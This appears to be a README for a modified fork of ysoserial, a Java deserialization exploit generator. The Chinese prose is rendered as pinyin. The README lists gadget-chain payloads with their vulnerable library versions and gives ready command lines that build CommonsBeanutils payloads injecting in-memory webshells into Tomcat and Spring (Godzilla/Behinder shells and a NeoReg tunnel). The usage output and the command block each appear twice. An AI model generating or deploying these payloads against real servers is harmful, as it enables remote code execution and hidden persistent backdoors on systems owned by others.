ysoserial
ysoserialXiu Gai Ban ,Zhao Zhong Xiu Gai ysoserial.payloads.util.Gadgets.createTemplatesImplShi Qi Ke Yi Tong Guo Yin Ru Zi Ding Yi classDe Xing Shi Lai Zhi Xing Ming Ling , Nei Cun Ma , Fan Xu Lie Hua Hui Xian .
Usage
$ java -jar ysoserial-0.0.6-SNAPSHOT-all.jar
Y SO SERIAL?
Usage: java -jar ysoserial-[version]-all.jar [payload] '[command]'
Available payload types:
Yi Yue 11, 2024 10:44:47 Shang Wu org.reflections.Reflections scan
Xin Xi : Reflections took 96 ms to scan 1 urls, producing 22 keys and 208 values
Payload Authors Dependencies
------- ------- ------------
AspectJWeaver @Jang aspectjweaver:1.9.2, commons-collections:3.2.2
BeanShell1 @pwntester, @cschneider4711 bsh:2.0b5
C3P0 @mbechler c3p0:0.9.5.2, mchange-commons-java:0.2.11
Ceylon @kai_ullrich ceylon.language:1.3.3
Click1 @artsploit click-nodeps:2.3.0, javax.servlet-api:3.1.0
Clojure @JackOfMostTrades clojure:1.8.0
CommonsBeanutils1 @frohoff commons-beanutils:1.9.2, commons-collections:3.1, commons-logging:1.2
CommonsBeanutils183NOCC @Y4er commons-beanutils:1.8.3
CommonsBeanutils192NOCC @Y4er commons-beanutils:1.9.2
CommonsBeanutils192WithDualTreeBidiMap @Y4er commons-beanutils:1.9.2, commons-collections:3.1
CommonsCollections1 @frohoff commons-collections:3.1
CommonsCollections12 @Y4er commons-collections:3.1
CommonsCollections2 @frohoff commons-collections4:4.0
CommonsCollections3 @frohoff commons-collections:3.1
CommonsCollections4 @frohoff commons-collections4:4.0
CommonsCollections5 @matthias_kaiser, @jasinner commons-collections:3.1
CommonsCollections6 @matthias_kaiser commons-collections:3.1
CommonsCollections7 @scristalli, @hanyrax, @EdoardoVignati commons-collections:3.1
CommonsCollections8 @navalorenzo commons-collections4:4.0
Fastjson1 @Y4er fastjson:1.2.83
Fastjson2 @Y4er fastjson:2.x
FileUpload1 @mbechler commons-fileupload:1.3.1, commons-io:2.4
Groovy1 @frohoff groovy:2.3.9
Hibernate1 @mbechler
Hibernate2 @mbechler
JBossInterceptors1 @matthias_kaiser javassist:3.12.1.GA, jboss-interceptor-core:2.0.0.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21
JRMPClient @mbechler
JRMPListener @mbechler
JSON1 @mbechler json-lib:jar:jdk15:2.4, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2, commons-lang:2.6, ezmorph:1.0.6, commons-beanutils:1.9.2, spring-core:4.1.4.RELEASE, commons-collections:3.1
Jackson1 @Y4er jackson-databind:2.14.2
Jackson2 @Y4er jackson-databind:2.14.2, spring-aop:4.1.4.RELEASE
JavassistWeld1 @matthias_kaiser javassist:3.12.1.GA, weld-core:1.1.33.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21
Jdk7u21 @frohoff
Jython1 @pwntester, @cschneider4711 jython-standalone:2.5.2
Jython2 @steven_seeley, @rocco_calvi jython-standalone:2.7.3
MozillaRhino1 @matthias_kaiser js:1.7R2
MozillaRhino2 @_tint0 js:1.7R2
Myfaces1 @mbechler
Myfaces2 @mbechler
ROME @mbechler rome:1.0
Spring1 @frohoff spring-core:4.1.4.RELEASE, spring-beans:4.1.4.RELEASE
Spring2 @mbechler spring-core:4.1.4.RELEASE, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2
URLDNS @gebl
Vaadin1 @kai_ullrich vaadin-server:7.7.14, vaadin-shared:7.7.14
Wicket1 @jacob-baines wicket-util:6.23.0, slf4j-api:1.6.4
Y SO SERIAL?
Usage: java -jar ysoserial-[version]-all.jar [payload] '[command]'
Available payload types:
Yi Yue 11, 2024 10:44:47 Shang Wu org.reflections.Reflections scan
Xin Xi : Reflections took 96 ms to scan 1 urls, producing 22 keys and 208 values
Payload Authors Dependencies
------- ------- ------------
AspectJWeaver @Jang aspectjweaver:1.9.2, commons-collections:3.2.2
BeanShell1 @pwntester, @cschneider4711 bsh:2.0b5
C3P0 @mbechler c3p0:0.9.5.2, mchange-commons-java:0.2.11
Ceylon @kai_ullrich ceylon.language:1.3.3
Click1 @artsploit click-nodeps:2.3.0, javax.servlet-api:3.1.0
Clojure @JackOfMostTrades clojure:1.8.0
CommonsBeanutils1 @frohoff commons-beanutils:1.9.2, commons-collections:3.1, commons-logging:1.2
CommonsBeanutils183NOCC @Y4er commons-beanutils:1.8.3
CommonsBeanutils192NOCC @Y4er commons-beanutils:1.9.2
CommonsBeanutils192WithDualTreeBidiMap @Y4er commons-beanutils:1.9.2, commons-collections:3.1
CommonsCollections1 @frohoff commons-collections:3.1
CommonsCollections12 @Y4er commons-collections:3.1
CommonsCollections2 @frohoff commons-collections4:4.0
CommonsCollections3 @frohoff commons-collections:3.1
CommonsCollections4 @frohoff commons-collections4:4.0
CommonsCollections5 @matthias_kaiser, @jasinner commons-collections:3.1
CommonsCollections6 @matthias_kaiser commons-collections:3.1
CommonsCollections7 @scristalli, @hanyrax, @EdoardoVignati commons-collections:3.1
CommonsCollections8 @navalorenzo commons-collections4:4.0
Fastjson1 @Y4er fastjson:1.2.83
Fastjson2 @Y4er fastjson:2.x
FileUpload1 @mbechler commons-fileupload:1.3.1, commons-io:2.4
Groovy1 @frohoff groovy:2.3.9
Hibernate1 @mbechler
Hibernate2 @mbechler
JBossInterceptors1 @matthias_kaiser javassist:3.12.1.GA, jboss-interceptor-core:2.0.0.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21
JRMPClient @mbechler
JRMPListener @mbechler
JSON1 @mbechler json-lib:jar:jdk15:2.4, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2, commons-lang:2.6, ezmorph:1.0.6, commons-beanutils:1.9.2, spring-core:4.1.4.RELEASE, commons-collections:3.1
Jackson1 @Y4er jackson-databind:2.14.2
Jackson2 @Y4er jackson-databind:2.14.2, spring-aop:4.1.4.RELEASE
JavassistWeld1 @matthias_kaiser javassist:3.12.1.GA, weld-core:1.1.33.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21
Jdk7u21 @frohoff
Jython1 @pwntester, @cschneider4711 jython-standalone:2.5.2
Jython2 @steven_seeley, @rocco_calvi jython-standalone:2.7.3
MozillaRhino1 @matthias_kaiser js:1.7R2
MozillaRhino2 @_tint0 js:1.7R2
Myfaces1 @mbechler
Myfaces2 @mbechler
ROME @mbechler rome:1.0
Spring1 @frohoff spring-core:4.1.4.RELEASE, spring-beans:4.1.4.RELEASE
Spring2 @mbechler spring-core:4.1.4.RELEASE, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2
URLDNS @gebl
Vaadin1 @kai_ullrich vaadin-server:7.7.14, vaadin-shared:7.7.14
Wicket1 @jacob-baines wicket-util:6.23.0, slf4j-api:1.6.4
Nei Cun Ma Xiang Guan
Yi CommonsBeanutils192NOCCWei Li :
java -jar ysoserial.jar CommonsBeanutils192NOCC "CLASS:TomcatCmdEcho" # TomcatCmdEcho
java -jar ysoserial.jar CommonsBeanutils192NOCC "CLASS:TomcatServletMemShellFromJMX" # TomcatServletMemShellFromJMX
java -jar ysoserial.jar CommonsBeanutils192NOCC "CLASS:TomcatServletMemShellFromThread" # TomcatServletMemShellFromThread
java -jar ysoserial.jar CommonsBeanutils192NOCC "CLASS:TomcatFilterMemShellFromJMX" # TomcatFilterMemShellFromJMX Gua Yong Yu tomcat7-9
java -jar ysoserial.jar CommonsBeanutils192NOCC "CLASS:TomcatFilterMemShellFromThread" # TomcatFilterMemShellFromThread Gua Yong Yu tomcat7-9
java -jar ysoserial.jar CommonsBeanutils192NOCC "CLASS:TomcatListenerMemShellFromJMX" # TomcatListenerMemShellFromJMX
java -jar ysoserial.jar CommonsBeanutils192NOCC "CLASS:TomcatListenerMemShellFromThread" # TomcatListenerMemShellFromThread
java -jar ysoserial.jar CommonsBeanutils192NOCC "CLASS:TomcatListenerNeoRegFromThread" # TomcatListenerNeoRegFromThread python neoreg.py -k fuckyou
java -jar ysoserial.jar CommonsBeanutils192NOCC "CLASS:SpringInterceptorMemShell" # SpringInterceptorMemShell Lian Jie shellXu Yao Shi Yong Cun Zai De Lu You
java -jar ysoserial.jar CommonsBeanutils192NOCC "FILE:E:\Calc.class" # ClassLoaderTemplate
java -jar ysoserial.jar CommonsBeanutils192NOCC "calc" # CommandTemplate CLASS: FILE: Bu Shi Yong Xie Yi Kai Tou Ze Mo Ren Wei Zhi Xing cmd
java -jar ysoserial.jar CommonsBeanutils192NOCC "CLASS:TomcatServletMemShellFromJMX" # TomcatServletMemShellFromJMX
java -jar ysoserial.jar CommonsBeanutils192NOCC "CLASS:TomcatServletMemShellFromThread" # TomcatServletMemShellFromThread
java -jar ysoserial.jar CommonsBeanutils192NOCC "CLASS:TomcatFilterMemShellFromJMX" # TomcatFilterMemShellFromJMX Gua Yong Yu tomcat7-9
java -jar ysoserial.jar CommonsBeanutils192NOCC "CLASS:TomcatFilterMemShellFromThread" # TomcatFilterMemShellFromThread Gua Yong Yu tomcat7-9
java -jar ysoserial.jar CommonsBeanutils192NOCC "CLASS:TomcatListenerMemShellFromJMX" # TomcatListenerMemShellFromJMX
java -jar ysoserial.jar CommonsBeanutils192NOCC "CLASS:TomcatListenerMemShellFromThread" # TomcatListenerMemShellFromThread
java -jar ysoserial.jar CommonsBeanutils192NOCC "CLASS:TomcatListenerNeoRegFromThread" # TomcatListenerNeoRegFromThread python neoreg.py -k fuckyou
java -jar ysoserial.jar CommonsBeanutils192NOCC "CLASS:SpringInterceptorMemShell" # SpringInterceptorMemShell Lian Jie shellXu Yao Shi Yong Cun Zai De Lu You
java -jar ysoserial.jar CommonsBeanutils192NOCC "FILE:E:\Calc.class" # ClassLoaderTemplate
java -jar ysoserial.jar CommonsBeanutils192NOCC "calc" # CommandTemplate CLASS: FILE: Bu Shi Yong Xie Yi Kai Tou Ze Mo Ren Wei Zhi Xing cmd
Yi Jian Zhu Ru cmdshell, Bing He , Ge Si La Nei Cun Ma ,shellLian Jie Shi Yong Qing Cha Kan Zhi Ding Lei . Jie Jue Liao requestHe responseBao Zhuang Lei Dao Zhi Bing He Lian Jie Shi Bai De Wen Ti ,Jian issue.
Yi Xia Shou Dao Gadgets.createTemplatesImplYing Xiang De gadgetJun Xu Yao Ru Shang Fang Shi Chuan Di Can Shu :
- Click1
- CommonsBeanutils1
- CommonsBeanutils183NOCC
- CommonsBeanutils192NOCC
- CommonsCollections2
- CommonsCollections3
- CommonsCollections4
- Hibernate1
- JavassistWeld1
- JBossInterceptors1
- Jdk7u21
- JSON1
- MozillaRhino1
- MozillaRhino2
- ROME
- Spring1
- Spring2
- Vaadin1
Xia Zai
Building
Requires Java 1.7+ and Maven 3.x+
mvn clean package -DskipTests
Contributing
- Fork it
- Create your feature branch (
git checkout -b my-new-feature) - Commit your changes (
git commit -am 'Add some feature') - Push to the branch (
git push origin my-new-feature) - Create new Pull Request